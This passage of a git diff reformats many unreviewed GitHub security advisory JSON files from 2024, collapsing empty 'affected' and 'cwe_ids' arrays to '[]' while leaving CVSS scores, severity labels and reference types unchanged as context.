[ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-qc45-54hc-mx8p/GHSA-qc45-54hc-mx8p.json b/advisories/unreviewed/2024/09/GHSA-qc45-54hc-mx8p/GHSA-qc45-54hc-mx8p.json index 4fe26ed4842..b74a4023bfd 100644 --- a/advisories/unreviewed/2024/09/GHSA-qc45-54hc-mx8p/GHSA-qc45-54hc-mx8p.json +++ b/advisories/unreviewed/2024/09/GHSA-qc45-54hc-mx8p/GHSA-qc45-54hc-mx8p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-qh7m-p5jw-2wvg/GHSA-qh7m-p5jw-2wvg.json b/advisories/unreviewed/2024/09/GHSA-qh7m-p5jw-2wvg/GHSA-qh7m-p5jw-2wvg.json index a4413cb0935..69beaf1cc01 100644 --- a/advisories/unreviewed/2024/09/GHSA-qh7m-p5jw-2wvg/GHSA-qh7m-p5jw-2wvg.json +++ b/advisories/unreviewed/2024/09/GHSA-qh7m-p5jw-2wvg/GHSA-qh7m-p5jw-2wvg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-r58j-wf5c-jr5h/GHSA-r58j-wf5c-jr5h.json b/advisories/unreviewed/2024/09/GHSA-r58j-wf5c-jr5h/GHSA-r58j-wf5c-jr5h.json index d68467b7df8..a65f640635f 100644 --- a/advisories/unreviewed/2024/09/GHSA-r58j-wf5c-jr5h/GHSA-r58j-wf5c-jr5h.json +++ b/advisories/unreviewed/2024/09/GHSA-r58j-wf5c-jr5h/GHSA-r58j-wf5c-jr5h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-rm8v-5w66-jm6j/GHSA-rm8v-5w66-jm6j.json b/advisories/unreviewed/2024/09/GHSA-rm8v-5w66-jm6j/GHSA-rm8v-5w66-jm6j.json index d511b2062ae..ba10f50c1f9 100644 --- a/advisories/unreviewed/2024/09/GHSA-rm8v-5w66-jm6j/GHSA-rm8v-5w66-jm6j.json +++ b/advisories/unreviewed/2024/09/GHSA-rm8v-5w66-jm6j/GHSA-rm8v-5w66-jm6j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-x4v7-2qvr-vh9c/GHSA-x4v7-2qvr-vh9c.json b/advisories/unreviewed/2024/09/GHSA-x4v7-2qvr-vh9c/GHSA-x4v7-2qvr-vh9c.json index 289e87addcb..977e83559f4 100644 --- a/advisories/unreviewed/2024/09/GHSA-x4v7-2qvr-vh9c/GHSA-x4v7-2qvr-vh9c.json +++ b/advisories/unreviewed/2024/09/GHSA-x4v7-2qvr-vh9c/GHSA-x4v7-2qvr-vh9c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-x63p-f88f-gg9j/GHSA-x63p-f88f-gg9j.json b/advisories/unreviewed/2024/09/GHSA-x63p-f88f-gg9j/GHSA-x63p-f88f-gg9j.json index 4de43d447d7..52f27d1ae99 100644 --- a/advisories/unreviewed/2024/09/GHSA-x63p-f88f-gg9j/GHSA-x63p-f88f-gg9j.json +++ b/advisories/unreviewed/2024/09/GHSA-x63p-f88f-gg9j/GHSA-x63p-f88f-gg9j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-xpqq-5557-v5jm/GHSA-xpqq-5557-v5jm.json b/advisories/unreviewed/2024/09/GHSA-xpqq-5557-v5jm/GHSA-xpqq-5557-v5jm.json index b69d5b2c039..c03f0688cf9 100644 --- a/advisories/unreviewed/2024/09/GHSA-xpqq-5557-v5jm/GHSA-xpqq-5557-v5jm.json +++ b/advisories/unreviewed/2024/09/GHSA-xpqq-5557-v5jm/GHSA-xpqq-5557-v5jm.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-xrh7-mhgj-f2r5/GHSA-xrh7-mhgj-f2r5.json b/advisories/unreviewed/2024/09/GHSA-xrh7-mhgj-f2r5/GHSA-xrh7-mhgj-f2r5.json index 55c675aa02f..e93eb1b5a89 100644 --- a/advisories/unreviewed/2024/09/GHSA-xrh7-mhgj-f2r5/GHSA-xrh7-mhgj-f2r5.json +++ b/advisories/unreviewed/2024/09/GHSA-xrh7-mhgj-f2r5/GHSA-xrh7-mhgj-f2r5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-269v-rmv9-mwh8/GHSA-269v-rmv9-mwh8.json b/advisories/unreviewed/2024/10/GHSA-269v-rmv9-mwh8/GHSA-269v-rmv9-mwh8.json index 5fc12ffed04..ee6472c4cfa 100644 --- a/advisories/unreviewed/2024/10/GHSA-269v-rmv9-mwh8/GHSA-269v-rmv9-mwh8.json +++ b/advisories/unreviewed/2024/10/GHSA-269v-rmv9-mwh8/GHSA-269v-rmv9-mwh8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-2cfj-58rp-82cv/GHSA-2cfj-58rp-82cv.json b/advisories/unreviewed/2024/10/GHSA-2cfj-58rp-82cv/GHSA-2cfj-58rp-82cv.json index b57b413c686..ed698746c8f 100644 --- a/advisories/unreviewed/2024/10/GHSA-2cfj-58rp-82cv/GHSA-2cfj-58rp-82cv.json +++ b/advisories/unreviewed/2024/10/GHSA-2cfj-58rp-82cv/GHSA-2cfj-58rp-82cv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-2f42-mj3m-xhvx/GHSA-2f42-mj3m-xhvx.json b/advisories/unreviewed/2024/10/GHSA-2f42-mj3m-xhvx/GHSA-2f42-mj3m-xhvx.json index 0ac2abe93a5..1b1c5526d84 100644 --- a/advisories/unreviewed/2024/10/GHSA-2f42-mj3m-xhvx/GHSA-2f42-mj3m-xhvx.json +++ b/advisories/unreviewed/2024/10/GHSA-2f42-mj3m-xhvx/GHSA-2f42-mj3m-xhvx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-2jm4-m62p-325r/GHSA-2jm4-m62p-325r.json b/advisories/unreviewed/2024/10/GHSA-2jm4-m62p-325r/GHSA-2jm4-m62p-325r.json index b4c62e3a9c4..f20e26dda49 100644 --- a/advisories/unreviewed/2024/10/GHSA-2jm4-m62p-325r/GHSA-2jm4-m62p-325r.json +++ b/advisories/unreviewed/2024/10/GHSA-2jm4-m62p-325r/GHSA-2jm4-m62p-325r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-3qhf-rfv2-rc83/GHSA-3qhf-rfv2-rc83.json b/advisories/unreviewed/2024/10/GHSA-3qhf-rfv2-rc83/GHSA-3qhf-rfv2-rc83.json index a856e1912e0..5f4157d3b98 100644 --- a/advisories/unreviewed/2024/10/GHSA-3qhf-rfv2-rc83/GHSA-3qhf-rfv2-rc83.json +++ b/advisories/unreviewed/2024/10/GHSA-3qhf-rfv2-rc83/GHSA-3qhf-rfv2-rc83.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-46m2-r42j-gr4p/GHSA-46m2-r42j-gr4p.json b/advisories/unreviewed/2024/10/GHSA-46m2-r42j-gr4p/GHSA-46m2-r42j-gr4p.json index ab00f573397..b0ccc1c244e 100644 --- a/advisories/unreviewed/2024/10/GHSA-46m2-r42j-gr4p/GHSA-46m2-r42j-gr4p.json +++ b/advisories/unreviewed/2024/10/GHSA-46m2-r42j-gr4p/GHSA-46m2-r42j-gr4p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-4ggp-xr27-wmh2/GHSA-4ggp-xr27-wmh2.json b/advisories/unreviewed/2024/10/GHSA-4ggp-xr27-wmh2/GHSA-4ggp-xr27-wmh2.json index c9180d94c2d..e2ec1853069 100644 --- a/advisories/unreviewed/2024/10/GHSA-4ggp-xr27-wmh2/GHSA-4ggp-xr27-wmh2.json +++ b/advisories/unreviewed/2024/10/GHSA-4ggp-xr27-wmh2/GHSA-4ggp-xr27-wmh2.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-52mx-xj4w-gw54/GHSA-52mx-xj4w-gw54.json b/advisories/unreviewed/2024/10/GHSA-52mx-xj4w-gw54/GHSA-52mx-xj4w-gw54.json index 058c8fd6bef..9ccfb5092f6 100644 --- a/advisories/unreviewed/2024/10/GHSA-52mx-xj4w-gw54/GHSA-52mx-xj4w-gw54.json +++ b/advisories/unreviewed/2024/10/GHSA-52mx-xj4w-gw54/GHSA-52mx-xj4w-gw54.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-5c67-j7mc-2w23/GHSA-5c67-j7mc-2w23.json b/advisories/unreviewed/2024/10/GHSA-5c67-j7mc-2w23/GHSA-5c67-j7mc-2w23.json index 8b702df982f..dd084ed56c0 100644 --- a/advisories/unreviewed/2024/10/GHSA-5c67-j7mc-2w23/GHSA-5c67-j7mc-2w23.json +++ b/advisories/unreviewed/2024/10/GHSA-5c67-j7mc-2w23/GHSA-5c67-j7mc-2w23.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-63q2-3m87-pq6j/GHSA-63q2-3m87-pq6j.json b/advisories/unreviewed/2024/10/GHSA-63q2-3m87-pq6j/GHSA-63q2-3m87-pq6j.json index 8e021beb4d1..09e4b6973c0 100644 --- a/advisories/unreviewed/2024/10/GHSA-63q2-3m87-pq6j/GHSA-63q2-3m87-pq6j.json +++ b/advisories/unreviewed/2024/10/GHSA-63q2-3m87-pq6j/GHSA-63q2-3m87-pq6j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-683h-34r2-xc99/GHSA-683h-34r2-xc99.json b/advisories/unreviewed/2024/10/GHSA-683h-34r2-xc99/GHSA-683h-34r2-xc99.json index 19f9e556402..4b353ac73c2 100644 --- a/advisories/unreviewed/2024/10/GHSA-683h-34r2-xc99/GHSA-683h-34r2-xc99.json +++ b/advisories/unreviewed/2024/10/GHSA-683h-34r2-xc99/GHSA-683h-34r2-xc99.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-6gcp-m839-5fw4/GHSA-6gcp-m839-5fw4.json b/advisories/unreviewed/2024/10/GHSA-6gcp-m839-5fw4/GHSA-6gcp-m839-5fw4.json index 3516daedc3c..942d93e4218 100644 --- a/advisories/unreviewed/2024/10/GHSA-6gcp-m839-5fw4/GHSA-6gcp-m839-5fw4.json +++ b/advisories/unreviewed/2024/10/GHSA-6gcp-m839-5fw4/GHSA-6gcp-m839-5fw4.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-6jf3-p3mx-v587/GHSA-6jf3-p3mx-v587.json b/advisories/unreviewed/2024/10/GHSA-6jf3-p3mx-v587/GHSA-6jf3-p3mx-v587.json index 17ccb894c56..58f4ce41fd7 100644 --- a/advisories/unreviewed/2024/10/GHSA-6jf3-p3mx-v587/GHSA-6jf3-p3mx-v587.json +++ b/advisories/unreviewed/2024/10/GHSA-6jf3-p3mx-v587/GHSA-6jf3-p3mx-v587.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-72cp-q9j9-fhvh/GHSA-72cp-q9j9-fhvh.json b/advisories/unreviewed/2024/10/GHSA-72cp-q9j9-fhvh/GHSA-72cp-q9j9-fhvh.json index d3ccd7f8605..6cd8e20244a 100644 --- a/advisories/unreviewed/2024/10/GHSA-72cp-q9j9-fhvh/GHSA-72cp-q9j9-fhvh.json +++ b/advisories/unreviewed/2024/10/GHSA-72cp-q9j9-fhvh/GHSA-72cp-q9j9-fhvh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-753j-68h2-88xf/GHSA-753j-68h2-88xf.json b/advisories/unreviewed/2024/10/GHSA-753j-68h2-88xf/GHSA-753j-68h2-88xf.json index 4b5f86bee96..b136bb5479c 100644 --- a/advisories/unreviewed/2024/10/GHSA-753j-68h2-88xf/GHSA-753j-68h2-88xf.json +++ b/advisories/unreviewed/2024/10/GHSA-753j-68h2-88xf/GHSA-753j-68h2-88xf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -55,9 +53,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-75x6-3558-67mc/GHSA-75x6-3558-67mc.json b/advisories/unreviewed/2024/10/GHSA-75x6-3558-67mc/GHSA-75x6-3558-67mc.json index 21f6ba10631..3b4d49d45bf 100644 --- a/advisories/unreviewed/2024/10/GHSA-75x6-3558-67mc/GHSA-75x6-3558-67mc.json +++ b/advisories/unreviewed/2024/10/GHSA-75x6-3558-67mc/GHSA-75x6-3558-67mc.json @@ -13,9 +13,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-76x3-rw7v-gwwh/GHSA-76x3-rw7v-gwwh.json b/advisories/unreviewed/2024/10/GHSA-76x3-rw7v-gwwh/GHSA-76x3-rw7v-gwwh.json index e7609164cde..f2ca9bb11f8 100644 --- a/advisories/unreviewed/2024/10/GHSA-76x3-rw7v-gwwh/GHSA-76x3-rw7v-gwwh.json +++ b/advisories/unreviewed/2024/10/GHSA-76x3-rw7v-gwwh/GHSA-76x3-rw7v-gwwh.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-7pfp-9xwm-7xfg/GHSA-7pfp-9xwm-7xfg.json b/advisories/unreviewed/2024/10/GHSA-7pfp-9xwm-7xfg/GHSA-7pfp-9xwm-7xfg.json index 31f65356ef2..d0562c2722a 100644 --- a/advisories/unreviewed/2024/10/GHSA-7pfp-9xwm-7xfg/GHSA-7pfp-9xwm-7xfg.json +++ b/advisories/unreviewed/2024/10/GHSA-7pfp-9xwm-7xfg/GHSA-7pfp-9xwm-7xfg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-89mf-4cg3-w93v/GHSA-89mf-4cg3-w93v.json b/advisories/unreviewed/2024/10/GHSA-89mf-4cg3-w93v/GHSA-89mf-4cg3-w93v.json index 9758243c928..52b65a1af8c 100644 --- a/advisories/unreviewed/2024/10/GHSA-89mf-4cg3-w93v/GHSA-89mf-4cg3-w93v.json +++ b/advisories/unreviewed/2024/10/GHSA-89mf-4cg3-w93v/GHSA-89mf-4cg3-w93v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-8hwq-h6q5-348p/GHSA-8hwq-h6q5-348p.json b/advisories/unreviewed/2024/10/GHSA-8hwq-h6q5-348p/GHSA-8hwq-h6q5-348p.json index e037588ef51..5ed5f0c62af 100644 --- a/advisories/unreviewed/2024/10/GHSA-8hwq-h6q5-348p/GHSA-8hwq-h6q5-348p.json +++ b/advisories/unreviewed/2024/10/GHSA-8hwq-h6q5-348p/GHSA-8hwq-h6q5-348p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-8mx7-3ccx-q5cq/GHSA-8mx7-3ccx-q5cq.json b/advisories/unreviewed/2024/10/GHSA-8mx7-3ccx-q5cq/GHSA-8mx7-3ccx-q5cq.json index 829a4587402..ffb9d27b460 100644 --- a/advisories/unreviewed/2024/10/GHSA-8mx7-3ccx-q5cq/GHSA-8mx7-3ccx-q5cq.json +++ b/advisories/unreviewed/2024/10/GHSA-8mx7-3ccx-q5cq/GHSA-8mx7-3ccx-q5cq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-92rw-4jh9-x8q2/GHSA-92rw-4jh9-x8q2.json b/advisories/unreviewed/2024/10/GHSA-92rw-4jh9-x8q2/GHSA-92rw-4jh9-x8q2.json index a235a9b622c..4a3d0fbf8b5 100644 --- a/advisories/unreviewed/2024/10/GHSA-92rw-4jh9-x8q2/GHSA-92rw-4jh9-x8q2.json +++ b/advisories/unreviewed/2024/10/GHSA-92rw-4jh9-x8q2/GHSA-92rw-4jh9-x8q2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-9jfw-gm57-mv43/GHSA-9jfw-gm57-mv43.json b/advisories/unreviewed/2024/10/GHSA-9jfw-gm57-mv43/GHSA-9jfw-gm57-mv43.json index f83e5159216..e3296a01463 100644 --- a/advisories/unreviewed/2024/10/GHSA-9jfw-gm57-mv43/GHSA-9jfw-gm57-mv43.json +++ b/advisories/unreviewed/2024/10/GHSA-9jfw-gm57-mv43/GHSA-9jfw-gm57-mv43.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -51,9 +49,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/10/GHSA-c6mx-ff55-jhcw/GHSA-c6mx-ff55-jhcw.json b/advisories/unreviewed/2024/10/GHSA-c6mx-ff55-jhcw/GHSA-c6mx-ff55-jhcw.json index 73f6eba4ab2..817b27c66ae 100644 --- a/advisories/unreviewed/2024/10/GHSA-c6mx-ff55-jhcw/GHSA-c6mx-ff55-jhcw.json +++ b/advisories/unreviewed/2024/10/GHSA-c6mx-ff55-jhcw/GHSA-c6mx-ff55-jhcw.json @@ -13,9 +13,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-ccfh-v7cp-3943/GHSA-ccfh-v7cp-3943.json b/advisories/unreviewed/2024/10/GHSA-ccfh-v7cp-3943/GHSA-ccfh-v7cp-3943.json index 0a019a343db..e7f4d1907fa 100644 --- a/advisories/unreviewed/2024/10/GHSA-ccfh-v7cp-3943/GHSA-ccfh-v7cp-3943.json +++ b/advisories/unreviewed/2024/10/GHSA-ccfh-v7cp-3943/GHSA-ccfh-v7cp-3943.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-ccgr-xwcc-r26p/GHSA-ccgr-xwcc-r26p.json b/advisories/unreviewed/2024/10/GHSA-ccgr-xwcc-r26p/GHSA-ccgr-xwcc-r26p.json index ecdad1379cc..bc0a30d5d79 100644 --- a/advisories/unreviewed/2024/10/GHSA-ccgr-xwcc-r26p/GHSA-ccgr-xwcc-r26p.json +++ b/advisories/unreviewed/2024/10/GHSA-ccgr-xwcc-r26p/GHSA-ccgr-xwcc-r26p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-cm4v-xxmw-47xm/GHSA-cm4v-xxmw-47xm.json b/advisories/unreviewed/2024/10/GHSA-cm4v-xxmw-47xm/GHSA-cm4v-xxmw-47xm.json index e78d614439b..e7b4a1cc568 100644 --- a/advisories/unreviewed/2024/10/GHSA-cm4v-xxmw-47xm/GHSA-cm4v-xxmw-47xm.json +++ b/advisories/unreviewed/2024/10/GHSA-cm4v-xxmw-47xm/GHSA-cm4v-xxmw-47xm.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-f8jv-g4f8-mp52/GHSA-f8jv-g4f8-mp52.json b/advisories/unreviewed/2024/10/GHSA-f8jv-g4f8-mp52/GHSA-f8jv-g4f8-mp52.json index 4fc69246b8d..307ea9d0894 100644 --- a/advisories/unreviewed/2024/10/GHSA-f8jv-g4f8-mp52/GHSA-f8jv-g4f8-mp52.json +++ b/advisories/unreviewed/2024/10/GHSA-f8jv-g4f8-mp52/GHSA-f8jv-g4f8-mp52.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-ff23-px5j-g8qq/GHSA-ff23-px5j-g8qq.json b/advisories/unreviewed/2024/10/GHSA-ff23-px5j-g8qq/GHSA-ff23-px5j-g8qq.json index 384d9cecb3b..f7ab4434176 100644 --- a/advisories/unreviewed/2024/10/GHSA-ff23-px5j-g8qq/GHSA-ff23-px5j-g8qq.json +++ b/advisories/unreviewed/2024/10/GHSA-ff23-px5j-g8qq/GHSA-ff23-px5j-g8qq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/10/GHSA-g7cv-x9wx-38gx/GHSA-g7cv-x9wx-38gx.json b/advisories/unreviewed/2024/10/GHSA-g7cv-x9wx-38gx/GHSA-g7cv-x9wx-38gx.json index b419c539153..7f5ca65aab6 100644 --- a/advisories/unreviewed/2024/10/GHSA-g7cv-x9wx-38gx/GHSA-g7cv-x9wx-38gx.json +++ b/advisories/unreviewed/2024/10/GHSA-g7cv-x9wx-38gx/GHSA-g7cv-x9wx-38gx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 